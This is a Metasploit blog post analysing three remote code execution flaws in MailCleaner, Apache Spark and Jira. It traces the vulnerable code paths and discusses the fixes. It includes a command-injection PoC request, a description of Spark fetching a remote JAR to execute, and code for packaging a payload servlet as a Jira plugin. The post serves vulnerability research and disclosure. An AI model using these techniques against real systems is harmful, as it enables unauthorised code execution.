Wei Chen, Lead Security Researcher and Exploit Developer, Metasploit
Caitlin Condon, Metasploit Community Manager
March 26, 2019
The world of exploit development is often considered arcane. Production code begets CVEs; CVEs yield proofs-of-concept (PoCs) that are shared across chatrooms and social networks. Before long, public exploits are available for testing, reverse engineering, and widespread commodity use. As open-source developers and researchers, the Metasploit Framework team is committed to building and reliant upon a strong foundation of community knowledge. As it happens, we also spend a fair bit of time shepherding vulnerabilities on their journey from incipient PoCs to stable, seasoned exploits. In the process, we learn about the never-ending nuances of vulnerability analysis and the complexities of secure software development. Spoiler: They’re both difficult, and they’re both essential.
Metasploit’s Development Diaries series sheds light on how Rapid7’s offensive research team analyzes vulnerabilities as potential candidates for inclusion in Metasploit Framework—in other words, how a vulnerability makes it through rigorous open-source committee to become a full-fledged Metasploit module. We also delve into some of the biases and development practices that influence the infosec community’s decisions on which exploits to pursue, which vulnerabilities to patch, and when workarounds or trade-offs are deemed a reasonable path for vendors to traverse.
The inaugural edition of this quarterly series will examine a bona fide vulnerability, an overpowered feature that was ripe for abuse, and a "foreverday" that exploits intended functionality to gain remote code execution on a target system.
Researcher and Metasploit contributor Mehmet Ince submitted an exploit module for “mailcleaner_exec” to Metasploit in December 2018. The module was based on his own initial analysis of a post-authentication RCE in the Logs_StartTrace SOAP web request for MailCleaner. MailCleaner is an anti-spam and antivirus software that functions as a filtering SMTP gateway. It comes in two editions: Enterprise and Community. The codebase for the open-source community edition can be found on GitHub.
At the time of analysis (Jan. 10, 2019), the community version "Jessie" (2018092601) was vulnerable. These days, the easiest way to audit the vulnerable codebase is to check out the source on GitHub:
$ git clone https://github.com/MailCleaner/MailCleaner.git $ cd MailCleaner $ git checkout a0281293c31b534cc7db4f798346722c321d078e $ git checkout -b CVE_2018_20323
Our analysis starts from the attack surface and moves through every major component that is part of the code path before we eventually hit the actually vulnerable code. Publicly, the vulnerability is assigned CVE-2018-20323.
Since a Metasploit module was submitted to GitHub, our analysis began with a PoC:
send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'), 'cookie' => cookie, 'vars_post' => { 'search' => rand_text_alpha(5), 'domain' => cmd, 'submit' => 1 }})
In here, cmd
stands for command, which means we can inject a system command in the domain
parameter of an HTTP POST request. The HTTP request also tells us we're sending the malicious input to path /admin/managetracing/search/search
.
MailCleaner is written as a PHP application using the Zend Framework (based on the model-view-controller architecture). Typically, the URL path gives us a hint of the name of the controller; in this case, it’s managetracing
, so our search begins there.
A quick search on GitHub tells us the managetracing
controller is handled by the ManageTracingController
class in www/guis/admin/application/controllers/ManagetracingController.php
. A controller may contain multiple actions, which are relatively easy to identify because they share the same naming convention—for instance, public function somethingAction()
.
In the case of ManageTracingController
, it supports these actions: index
, search
, logextract
, and downloadtrace
. Since our PoC points to search
in the URL, that’s the action we want to look at.
In the PoC, the domain
parameter is passed as a way to inject malicious commands. The search parameters get loaded rather early in searchAction
, specifically in the last line of this code block:
public function searchAction() { $layout = Zend_Layout::getMvcInstance(); $view=$layout->getView(); $layout->disableLayout(); $view->addScriptPath(Zend_Registry::get('ajax_script_path')); $view->thisurl = Zend_Controller_Action_HelperBroker::getStaticHelper('url')->simple('index', 'managecontentquarantine', NULL, array()); $request = $this->getRequest(); $loading = 1; if (! $request->getParam('load')) { sleep(1); $loading = 0; } $view->loading = $loading; $view->params = $this->getSearchParams();
Looking at the getSearchParams
function (also found in ManagetracingController.php), we can tell this is more of a normalizer. The first thing it does is convert an array of supported parameters into a hash:
foreach (array('search', 'domain', 'sender', 'mpp', 'page', 'sort', 'fd', 'fm', 'td', 'tm', 'submit', 'cancel', 'hiderejected') as $param) { $params[$param] = ''; if ($request->getParam($param)) { $params[$param] = $request->getParam($param); } }
If we continue to focus on the domain
parameter the PoC uses, we see the domain
parameter is concatenated to a string and saved as a regexp
key in the $params
hash toward the end of the function:
if (isset($params['search']) && isset($params['domain'])) { $params['regexp'] = $params['search'].'.*@'.$params['domain']; }
The above piece of information is important because it gets used later to get our remote code execution.
Back to the previous searchAction
function, we then trigger this code path:
$element = new Default_Model_MessageTrace(); // ... code snipped ... if ($request->getParam('domain') != "") { $trace_id = $element->startFetchAll($params); $session->trace_id = $trace_id; }
The startFetchAll
call is interesting to us because it handles our normalized parameters. We can tell startFetchAll
comes from the Default_Model_MessageTrace
class found in www/guis/admin/application/models/MessageTrace.php
, so naturally that's where we investigate first:
public function startFetchAll($params) { return $this->getMapper()->startFetchAll($params); }
Turns out that this is just a wrapper to another startFetchAll
function, which is also quick to find if you have a decent code editor to guide you:
public function startFetchAll($params) { $trace_id = 0; $slave = new Default_Model_Slave(); $slaves = $slave->fetchAll(); foreach ($slaves as $s) { $res = $s->sendSoapRequest('Logs_StartTrace', $params); if (isset($res['trace_id'])) { $trace_id = $res['trace_id']; $params['trace_id'] = $trace_id; } else { continue; } } return $trace_id; }
So, the above code tells us our parameters get sent via a SOAP request, specifically to the Logs_StartTrace
handler. A quick grep
for that in the codebase tells us that all the SOAP API can be found in the /www/soap
directory, and we come up with these results:
$ grep -R Logs_StartTrace * application/MCSoap/Logs.php: static public function Logs_StartTrace($params) { application/SoapInterface.php: static public function Logs_StartTrace($params) { application/SoapInterface.php: return MCSoap_Logs::Logs_StartTrace($params);
When auditing, it is always a good idea to look at the interface first to make sure you're following the flow correctly. The SOAP interface tells us to go look at the static function in MCSoap_Logs
:
static public function Logs_StartTrace($params) { return MCSoap_Logs::Logs_StartTrace($params); }
Our next step, then, is to look at the static Logs_StartTrace
function. The code looks a bit more complicated, but pay close attention to the regexp
parameter. You will notice that it gets absorbed into a $cmd
variable, and this variable later gets executed as a system command. See the second line from the bottom, before the return statement:
static public function Logs_StartTrace($params) { $trace_id = 0; require_once('MailCleaner/Config.php'); $mcconfig = MailCleaner_Config::getInstance(); if (!isset($params['regexp']) || !$params['datefrom'] || !preg_match('/^\d{8}$/', $params['datefrom']) || !$params['dateto'] || !preg_match('/^\d{8}$/', $params['dateto']) ) { return array('trace_id' => $trace_id); } $cmd = $mcconfig->getOption('SRCDIR')."/bin/search_log.pl ".$params['datefrom']." ".$params['dateto']." '".$params['regexp']."'"; if (isset($params['filter']) && $params['filter'] != '') { $cmd .= " '".$params['filter']."'"; } if (isset($params['hiderejected']) && $params['hiderejected']) { $cmd .= ' -R '; } if (isset($params['trace_id']) && $params['trace_id']) { $trace_id = $params['trace_id']; } else { $trace_id = md5(uniqid(mt_rand(), true)); } $cmd .= " -B ".$trace_id; $cmd .= "> ".$mcconfig->getOption('VARDIR')."/run/mailcleaner/log_search/".$trace_id." &"; $res = `$cmd`; return array('trace_id' => $trace_id, 'cmd' => $cmd) ; }
The code also tells us that the $regexp
isn't the only parameter that can be used to inject malicious inputs. The $filter
parameter (which is the normalized version of the $sender
parameter) can also trigger the same problem, but it's patched.
Now that we are at the code that ends up executing the malicious input, we can conclude our root cause analysis for MailClient command injection vulnerability.
A patch was applied using PHP's escapeshellarg
to sanitize the inputs and was committed to GitHub as c2bc42c3df013dbc5b419ae746ea834cf7542399. Although this seems to work fine on Linux, escapeshellarg
has a history of security problems specific to Windows that allow bypasses. This means even after the patch, the SOAP API would potentially still be a threat to Windows users who are running older versions of PHP.
It is also interesting that instead of submitting the patch as a pull request (as one might expect and as is normal for this project), the fix in this case was committed directly to master. It seems likely that this tactic was an attempt to slip the patch in under the radar before malicious attackers had a chance to spot the flaw in a pull request and exploit end users. Unfortunately, it also means that experts in the codebase may not have had enough opportunity to audit the fix for completeness.
The vulnerability here requires a password to achieve successful command injection. As a community, we tend to have a soft spot for pre-auth shells; a post-auth shell isn’t as immediately exciting, so when we see that a password is required, our enthusiasm gets knocked down a notch. But in our experience, the password requirement often indicates an underestimated exploitable condition: Many web applications rely on system functions such as the ability to execute system commands and read/write files. This dependency makes weak passwords arguably the worst vulnerabilities in a network, since it doesn't take a whole lot of skill or sophistication for attackers to crack passwords. Strong password policies and enforcement mechanisms are able to prevent many post-auth zero-days from succeeding. This vulnerability highlights our biases and underscores the need for robust password policies.
It’s pretty rare for 0day to drop in the public Metasploit pull request queue, so that alone makes this vulnerability worth analysis and module development. If we’d seen a regular old CVE description instead of a pull request sans CVE reference, we might have needed some more gut-instinct approximations on application popularity, commonality across industry verticals, or the types of users who typically have access. Ultimately, the exploit is too easy to ignore: The vulnerability is worth both patching and exploitation.
The details of the vulnerability, as described in the vulnerability analysis section above, are essential for creating a module. If you want to craft a working exploit, there’s no replacement for the knowledge gained in assessing the application. That said, one of the major benefits Metasploit Framework offers exploit devs and researchers is access to reusable components honed through years of real-world use. To turn the above PoC into a Metasploit module only requires fleshing out a module template (available here, along with related information) and using the handy HttpClient mixin (learn how from this usage doc, including examples). The finished module can be found here.
In November 2018, Metasploit committer and community member Green-m submitted a module for “spark_unauth_rce”. Apache Spark is an open-source cluster-computing framework that was originally developed by UC Berkeley’s AMPLab and is maintained by the Apache Software Foundation. It is primarily written in Scala and is designed to be a fast unified analytics engine for large data. It is common in enterprise environments, which always catches our attention.
Researcher Fengwei Zhang of Alibaba’s cloud security team discovered the REST API CreateSubmissionRequest
can be abused while in standalone mode to allow users to submit malicious code that results in remote code execution. According to Apache Spark's security issue list, this vulnerability was assigned CVE-2018-11770.
According to the Apache Software Foundation, versions from 1.3.0 running standalone master with REST API enabled are vulnerable, as are versions running Mesos master with cluster mode enabled.
For testing purposes, the vulnerable version of Apache Spark can be installed as a Docker container by performing the following:
$ git clone https://github.com/vulhub/vulhub/tree/master/spark/unacc $ docker-compose up -d
There’s a community-written walkthrough of manual installation for the Windows version here. The release notes for Apache Spark indicate that the vulnerability was patched in version 2.4.0, and you can see the corresponding Jira ticket here. The pull request can be found at #22071, where we learn the following specifics:
spark.master.rest.enabled=true
(in the config file)Apache Spark is well-documented—from release notes to Jira tickets and pull requests—so it doesn't take long to identify the code responsible for the insecure submission. Based on the patch, the culprit is the StandaloneRestServer
class.
The StandaloneRestServer
class actually extends from the abstract RestSubmissionServer
class, so we need to look at that first. In the beginning of this class, it tells us how the URLs are mapped:
protected val baseContext = s"/${RestSubmissionServer.PROTOCOL_VERSION}/submissions" protected lazy val contextToServlet = Map[String, RestServlet]( s"$baseContext/create/*" -> submitRequestServlet, s"$baseContext/kill/*" -> killRequestServlet, s"$baseContext/status/*" -> statusRequestServlet, "/*" -> new ErrorServlet // default handler )
The above tells us that if the server sees a request in this format, go to the submitRequestServlet class
:
/v1/submissions/create
Inside the submitRequestServlet
class, there is a doPost
function:
protected override def doPost( requestServlet: HttpServletRequest, responseServlet: HttpServletResponse): Unit = { val responseMessage = try { val requestMessageJson = Source.fromInputStream(requestServlet.getInputStream).mkString val requestMessage = SubmitRestProtocolMessage.fromJson(requestMessageJson) // The response should have already been validated on the client. // In case this is not true, validate it ourselves to avoid potential NPEs. requestMessage.validate() handleSubmit(requestMessageJson, requestMessage, responseServlet) } catch { // The client failed to provide a valid JSON, so this is not our fault case e @ (_: JsonProcessingException | _: SubmitRestProtocolException) => responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST) handleError("Malformed request: " + formatException(e)) } sendResponse(responseMessage, responseServlet) }
What this does is retrieve data from the stream, normalize it, and then pass that to a handleSubmit
function. Anyone using RestSubmissionServer
would have to implement handleSubmit
.
Now that we have a basic understanding of the abstract class, we can look at the subclasses. StandaloneRestServer
is one of those that extends RestSubmissionServer
and seems to fit the description of the problem.
private[deploy] class StandaloneRestServer( host: String, requestedPort: Int, masterConf: SparkConf, masterEndpoint: RpcEndpointRef, masterUrl: String) extends RestSubmissionServer(host, requestedPort, masterConf)
It's also easy to identify what we should be looking at because of this line in the code:
protected override val submitRequestServlet = new StandaloneSubmitRequestServlet(masterEndpoint, masterUrl, masterConf)
In StandaloneSubmitRequestServlet
, we find the handleSubmit
code we need:
protected override def handleSubmit( requestMessageJson: String, requestMessage: SubmitRestProtocolMessage, responseServlet: HttpServletResponse): SubmitRestProtocolResponse = { requestMessage match { case submitRequest: CreateSubmissionRequest => val driverDescription = buildDriverDescription(submitRequest) val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse]( DeployMessages.RequestSubmitDriver(driverDescription)) val submitResponse = new CreateSubmissionResponse submitResponse.serverSparkVersion = sparkVersion submitResponse.message = response.message submitResponse.success = response.success submitResponse.submissionId = response.driverId.orNull val unknownFields = findUnknownFields(requestMessageJson, requestMessage) if (unknownFields.nonEmpty) { // If there are fields that the server does not know about, warn the client submitResponse.unknownFields = unknownFields } submitResponse case unexpected => responseServlet.setStatus(HttpServletResponse.SC_BAD_REQUEST) handleError(s"Received message of unexpected type ${unexpected.messageType}.") } }
Looking at the code, the buildDriverDescription
function seems interesting. To start with, it reveals what the appResource
parameter means. The function is large, but it begins this way:
val appResource = Option(request.appResource).getOrElse { throw new SubmitRestMissingFieldException("Application jar is missing.") }
Toward the end of the code, it is passed in DriverDescription
:
new DriverDescription(appResource, actualDriverMemory, actualDriverCores, actualSuperviseDriver, command)
When we look at the DriverDescription
class, we understand appResource
's purpose, which is a URL to a JAR file:
private[deploy] case class DriverDescription( jarUrl: String, mem: Int, cores: Int, supervise: Boolean, command: Command)
This means that when we create a submission request, we can pass a JAR from remote, which dictates the attack vector.
The buildDriverDescription
function also contains clues about how the JAR is launched:
val command = new Command( "org.apache.spark.deploy.worker.DriverWrapper", Seq("{{WORKER_URL}}", "{{USER_JAR}}", mainClass) ++ appArgs, environmentVariables, extraClassPath, extraLibraryPath, javaOpts)
The Command
class is defined as follows:
private[spark] case class Command( mainClass: String, arguments: Seq[String], environment: Map[String, String], classPathEntries: Seq[String], libraryPathEntries: Seq[String], javaOpts: Seq[String]) { }
We see that the first argument is the main class, which in this case is org.apache.spark.deploy.worker.DriverWrapper
. It is meant to invoke our main
method:
val clazz = Utils.classForName(mainClass) val mainMethod = clazz.getMethod("main", classOf[Array[String]]) mainMethod.invoke(null, extraArgs.toArray[String])
After the driver description is crafted, it is sent to another component called RequestSubmitDriver
:
val response = masterEndpoint.askSync[DeployMessages.SubmitDriverResponse](DeployMessages.RequestSubmitDriver(driverDescription))
RequestSubmitDriver
can be found in the receiveAndReply
function in Master.scala:
case RequestSubmitDriver(description) => if (state != RecoveryState.ALIVE) { val msg = s"${Utils.BACKUP_STANDALONE_MASTER_PREFIX}: $state. " + "Can only accept driver submissions in ALIVE state." context.reply(SubmitDriverResponse(self, false, None, msg)) } else { logInfo("Driver submitted " + description.command.mainClass) val driver = createDriver(description) persistenceEngine.addDriver(driver) waitingDrivers += driver drivers.add(driver) schedule()
In the else
block, we see that based on the description, our driver is added to some collection of drivers before it calls for schedule()
.
private def schedule(): Unit = { if (state != RecoveryState.ALIVE) { return } val shuffledAliveWorkers = Random.shuffle(workers.toSeq.filter(_.state == WorkerState.ALIVE)) val numWorkersAlive = shuffledAliveWorkers.size var curPos = 0 for (driver <- waitingDrivers.toList) { var launched = false var numWorkersVisited = 0 while (numWorkersVisited < numWorkersAlive && !launched) { val worker = shuffledAliveWorkers(curPos) numWorkersVisited += 1 if (worker.memoryFree >= driver.desc.mem && worker.coresFree >= driver.desc.cores) { launchDriver(worker, driver) waitingDrivers -= driver launched = true } curPos = (curPos + 1) % numWorkersAlive } } startExecutorsOnWorkers() }
Notice this launchDriver
function. Looking further:
private def launchDriver(worker: WorkerInfo, driver: DriverInfo) { logInfo("Launching driver " + driver.id + " on worker " + worker.id) worker.addDriver(driver) driver.worker = Some(worker) worker.endpoint.send(LaunchDriver(driver.id, driver.desc)) driver.state = DriverState.RUNNING }
The code relies on the Worker
class to launch the driver. We can find this in Worker.scala
:
case LaunchDriver(driverId, driverDesc) => logInfo(s"Asked to launch driver $driverId") val driver = new DriverRunner( conf, driverId, workDir, sparkHome, driverDesc.copy(command = Worker.maybeUpdateSSLSettings(driverDesc.command, conf)), self, workerUri, securityMgr) drivers(driverId) = driver driver.start()
If you’re wondering what driver.start()
does, you’re not alone. Since this is from a DriverRunner
instance, that's where we find the code.
The purpose of DriverRunner
is self-explanatory. The Worker
class tells us we should be looking at the start()
function; there is a lot of code for process setup and handling, which we’ll skip to get to the point. Tracing from start()
, it leads to a path of start()
to prepareAndRunDriver()
, to runDriver()
, and finally to runCommandWithRetry()
. The runCommandWithRetry()
function then executes our code using ProcessBuilder
:
private[worker] def runCommandWithRetry( command: ProcessBuilderLike, initialize: Process => Unit, supervise: Boolean): Int = { // ... code snipped ... synchronized { if (killed) { return exitCode } process = Some(command.start()) initialize(process.get) }
Now that we have found the code that executes our payload, we should have a basic understanding of what the execution flow looks like.
Apache indicated the vulnerability was patched in version 2.4.0 as of Aug. 14, 2018, but the fix it implemented was to “disable the REST API by setting spark.master.rest.enabled to false” and/or to “ensure that all network access to the REST API (port 6066 by default) is restricted to hosts that are trusted to submit jobs.” The fix, in other words, smells a whole lot more like a workaround than a true patch. We don’t point this out because the fix was unreasonable or ineffective—on the contrary, software producers often call functional workarounds patches when true patching isn't a realistic or cost-effective option.
We would be remiss if we failed to mention that Apache Spark has quite a few beneficial software development habits that Metasploit appreciates and others may want to consider implementing. Throughout the review process, we noticed that PR numbers were attached to tickets whenever possible, and PR titles were properly labeled with Jira ticket numbers. Developers take the time to write detailed descriptions for their pull requests, and they devote genuine effort to ensuring reviewers understand them. This is rare in our experience. We also admired the dedication to thorough code review, well-written release notes, useful references, and comments evident throughout the codebase.
Apache Spark’s CreateSubmissionRequest
REST API is, by definition, a feature, not a bug. However, it’s not as well-documented to the usual standards of the Apache Spark project. On top of this, it’s enabled by default. Combined, these features resulted in an overpowered feature that was ready to be reliably abused by attackers.
There wasn’t a clear consensus among the Metasploit research team on how immediately useful exploitation would be in this case. With that said, unauthenticated RCE is usually too compelling to pass up without a good reason—like many offensive practitioners, we wouldn’t say no if we saw an exploit opportunity in a dark corner of a client’s tech stack.
The Metasploit module relies on two mixins to exploit the vulnerability: HttpClient
and HttpServer
. These two mixins can prove tricky to use together, since the attacker is usually just one side or the other. In this case, the attacker is both client and server—you can find documentation on how to use them both in cases like this here.
The HttpServer
mixin is used to host the payload. HttpClient
sends a submission request to Apache Spark's REST API server, which instructs it to download the payload. The module is highly reliable, but both offensive and defensive practitioners will want to note that it can leave quite a few artifacts on the target system. The most obvious of these is the malicious driver that can be seen in the master GUI.
The Metasploit style conventions suggest that modules use randomness whenever they are able—i.e., randomizing the payload name, path, padding, and so on. In this case, however, randomness actually makes the payload stand out a lot on the master GUI list, making it an exception to the randomness rule.
In February 2018, Metasploit contributor Alex Gonzalez submitted an authenticated code exec exploit module, “jira_plugin_upload” to the Framework. Jira is a popular Java application used for bug tracking and agile project management. It is developed by Atlassian and boasts a global customer base that includes a large number of high-profile corporate and government entities.
While neither the module description nor the documentation goes into a detailed analysis of the vulnerability, it is clear that the Universal Plugin Manager (UPM) component is the root cause. The upload feature in the UPM would allow a Jira user to upload a malicious plugin (add-on) and achieve remote code execution. The implication, which we later confirmed, was that authentication is required to achieve this.
During our analysis, we tested with Jira 7.8.0. However, since the main dependency is the implementation of Atlassian’s UPM framework, all versions of Jira should be vulnerable—making this a classic “foreverday” vulnerability. You can find Windows installation instructions here and Linux/Mac installation information here. After installation, create a plugin.
We used tools from SysInternalSuite for the initial analysis of this vulnerability.
After installing Jira, we learned that the default port is 2990 (HTTP), and the TCPView utility tells us this is a java.exe process
.
Process Monitor is used to monitor the operations that occur when an exploit is fired against java.exe
. We know that the exploit attempts to upload a Metasploit Java payload to Jira, so you should expect some activities related to a `Payload.class` file. On Windows, the actual path the payload gets uploaded to is the following location:
C:\Users\TestUser\myPlugin\target\container\tomcat8x\cargo-jira-home\temp\~spawn6080520409872505521.tmp.dir\metasploit\Payload.class
Most significantly, Process Monitor also reveals the location of the JAR file for UPM:
C:\Users\TestUser\myPlugin\target\container\tomcat8x\cargo-jira-home\webapps\jira\WEB-INF\atlassian-bundled-plugins\atlassian-universal-plugin-manager-plugin-2.22.9.jar
To take a closer look at the atlassian-universal-plugin-manager-plugin
JAR file, a Java decompiler is needed. There are many out in the wider internet world, but in this case, we picked JD-GUI for the task. This JAR file includes quite a few interesting classes. The one that stands out the most for our purposes is the FileUploadBase
class (in org.apache.commons.fileupload
) because of the Streams.copy
statement in the parseRequest
function (abbreviated):
fileName = ((FileUploadBase.FileItemIteratorImpl.FileItemStreamImpl)item).name; FileItem fileItem = fac.createItem(item.getFieldName(), item.getContentType(), item .isFormField(), fileName); items.add(fileItem); try { Streams.copy(item.openStream(), fileItem.getOutputStream(), true); }
Typically, to confirm we're on the right path, we would need a log file or a debugger. The latter option is usually much better, as it allows us to set a breakpoint to let us know we’re looking at the right thing. Fortunately, Jira supports remote debugging in a rather convenient way—Atlassian’s documentation describes how to do this with either IntelliJ IDEA or Eclipse.
We set up a Java method breakpoint in IntelliJ on the parseRequest method in the org.apache.commons.fileupload.FileUploadBase
class.
By firing the exploit again, we hit our breakpoint, which confirms our assumptions. The Streams.copy
statement specifically copies our payload to the directory C:\Users\TestUser\myPlugin\target\container\tomcat8x\cargo-jira-home\temp\plug_[token]_[payloadname].jar
.
The thread dump from IntelliJ also tells the code path to reach the FileUploadBase
class (output is modified to fit the screen):
org.apache.commons.fileupload.util.Streams.copy org.apache.commons.fileupload.FileUploadBase.parseRequest com.atlassian.plugins.rest.common.multipart.fileupload.CommonsFileUploadMultipartHandler.getForm com.atlassian.plugins.rest.common.multipart.fileupload.CommonsFileUploadMultipartHandler.getForm(CommonsFileUploadMultipartHandler.java:66) com.atlassian.plugins.rest.common.multipart.fileupload.CommonsFileUploadMultipartHandler.getFilePart(CommonsFileUploadMultipartHandler.java:32) com.atlassian.upm.core.rest.resources.PluginCollectionResource.installFromFileSystem(PluginCollectionResource.java:254)
The last line of the dump tells us the com.atlassian.upm.core.rest.resources.PluginCollectorResource.installFromFileSystem
is handling the installation on the REST API level, so we investigate.
The installFromFileSystem
function in the PluginCollectionResource
tells us a lot. First off, the following is the decompiled code:
@POST @Consumes({"multipart/form-data", "multipart/mixed"}) @XsrfProtectionExcluded public Response installFromFileSystem(@Context MultipartHandler multipartHandler, @Context HttpServletRequest request, @DefaultValue("jar") @QueryParam("type") String type, @QueryParam("token") String token) { this.permissionEnforcer.enforcePermission(Permission.MANAGE_IN_PROCESS_PLUGIN_INSTALL_FROM_FILE); UpmResources.validateToken(token, this.userManager.getRemoteUserKey(), "text/html", this.tokenManager, this.representationFactory); try { FilePart filePart = multipartHandler.getFilePart(request, "plugin"); File plugin = copyFilePartToTemporaryFile(filePart, type); AsyncTask task = new InstallFromFileTask(Option.option(filePart.getName()), plugin, this.pluginInstaller, this.selfUpdateController, this.uriBuilder, this.appManager, this.i18nResolver); AsyncTaskInfo taskInfo = this.taskManager.executeAsynchronousTask(task); Response response = this.taskRepresentationFactory.createLegacyAsyncTaskRepresentation(taskInfo).toNewlyCreatedResponse(this.uriBuilder); String acceptHeader = request.getHeader("Accept"); if ((acceptHeader != null) && ( (acceptHeader.contains("text/html")) || (acceptHeader.contains("*")))) { return Response.fromResponse(response).type("text/html").build(); } return response; } catch (IOException e) { return Response.serverError().entity(this.representationFactory.createErrorRepresentation(e.getMessage())).type("application/vnd.atl.plugins.error+json").build(); } }
The first things you’re likely to notice are the PluginCollectionResource method annotations at the beginning, described in the table below:
@POST |
An HTTP POST request is needed for this function to kick in. |
@Consumes |
Content-type such as multipart/form-data and multipart/mixed are needed in the POST request. |
@XsrfProtectionExcluded |
No XSRF protection. This is enabled by default in the Atlassian REST 3.0 API. |
From the arguments, we also know the function needs a type and that a JAR file is expected by default. It also needs a token, which is obtained after login.
The very first thing the function does is enforce the MANAGE_IN_PROCESS_PLUGIN_INSTALL_FROM_FILE
permission. This, plus token validation, means the API requires authentication to obtain this privilege, and during our analysis, we realized this permission usually or always requires admin-level access. It is worth mentioning that the default username and password combination for Jira is admin
/admin
, which invites compromise. However, to give Atlassian credit, a password policy feature (as well as a CAPTCHA) does exist—it’s just disabled by default. When enabled, this password policy would significantly mitigate the attack vector.
The rest of the code uses FileUploadBase
to do the following:
Perform the upload |
Save the JAR file |
Install it (this relies on |
FilePart filePart = multipartHandler.getFilePart(request, "plugin"); |
File plugin = copyFilePartToTemporaryFile(filePart, type);
|
AsyncTask task = new InstallFromFileTask(Option.option(filePart.getName()), plugin, this.pluginInstaller, this.selfUpdateController, this.uriBuilder, this.appManager, this.i18nResolver);
|
The process for properly building an Atlassian plugin for a servlet is documented here. First, create an atlassian-plugin.xml similar to the following:
<atlassian-plugin name="Hello World Servlet" key="example.plugin.helloworld" plugins-version="2"> <plugin-info> <description>A basic Servlet module test - says "Hello World!</description> <vendor name="Atlassian Software Systems" url="http://www.atlassian.com"/> <version>1.0</version> </plugin-info> <servlet name="Hello World Servlet" key="helloWorld" class="com.example.myplugins.helloworld.HelloWorldServlet"> <description>Says Hello World, Australia or your name.</description> <url-pattern>/helloworld</url-pattern> <init-param> <param-name>defaultName</param-name> <param-value>Australia</param-value> </init-param> </servlet> </atlassian-plugin>
Your servlet will be accessible within the Atlassian web application via each url-pattern
you specify, beneath the /plugins/servlet
parent path. For example, if you specify a url-pattern
of /helloworld
as above, and your Atlassian application was deployed at localhost/jira
, then your servlet would be accessible at localhost/jira/plugins/servlet/helloworld
. Simply send a GET
request to this path to execute the malicious servlet.
As is standard for authenticated users in almost any popular content management system (see: WordPress), uploading is a feature for the UPM component, not an unintentional attack vector. However, since Jira does not enforce a password policy by default and relies on an easily guessed password for the admin
user out of the box, we are able to exploit this functionality to achieve remote code execution. Metasploit particularly appreciates foreverday vulnerabilities like this one for their ability to even temporarily redefine the accepted and measured definition of “risk.” RCE plus a large user base makes a potent combination; since our team knows this exploit is used in the wild on engagements, the decision to analyze and incorporate it into Metasploit Framework was a simple one.
To build a Metasploit module for this, the HttpClient
mixin should be more than enough to accomplish most tasks, including logging in, obtaining a token, uploading, and executing the servlet. To build the plugin (add-on), you’ll need to use the following packaging, as the module author demonstrates:
zip = payload.encoded_jar zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class') zip.add_file('/metasploit/PayloadServlet.class', servlet) contents = zip.pack
As a former Metasploit researcher once said, a software vulnerability at its core can be thought of as an undocumented, unintentional application program interface—unless, that is, the application-program-interfacing is entirely intentional and wears the hat of a feature. In the course of our everyday research and content analysis, the Metasploit Framework team encounters the full spectrum of RCE-bedecked functionality: bugs that are recognized as obvious accidents and efficiently fitted with CVEs; features that don’t know their own strength and are dressed down with modified configuration recommendations; and foreverday vulnerabilities laid bare by a combination of vendor choice and human failure.
As ever, we are grateful to our community of contributors and users for their creativity, their persistence, and their dedication to demonstrating both expected and unconventional risk.
Rapid7 has a robust disclosure policy and a team that actively works with external researchers and vendors on coordinated disclosure. Occasionally, Metasploit’s research team is tapped to develop PoC exploits or module-ize an existing PoC that demonstrates risk and impact to third parties. If you’re a Metasploit contributor with an undisclosed vulnerability you’d like to submit as a pull request, we salute you—but please allow us to help you coordinate disclosure with the vendor first: cve@rapid7.com (PGP public key 959D3EDA, for those who are so inclined).
Metasploit is a collaboration between Rapid7 and the open source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. To download Metasploit, visit metasploit.com.
Rapid7 (Nasdaq: RPD) is advancing security with visibility, analytics, and automation delivered through our Insight cloud. Our solutions simplify the complex, allowing security teams to work more effectively with IT and development to reduce vulnerabilities, monitor for malicious behavior, investigate and shut down attacks, and automate routine tasks. Over 7,200 customers rely on Rapid7 technology, services, and research to improve security outcomes and securely advance their organizations. For more information about Rapid7 or to join our threat research, visit our website, check out our blog, or follow us on Twitter.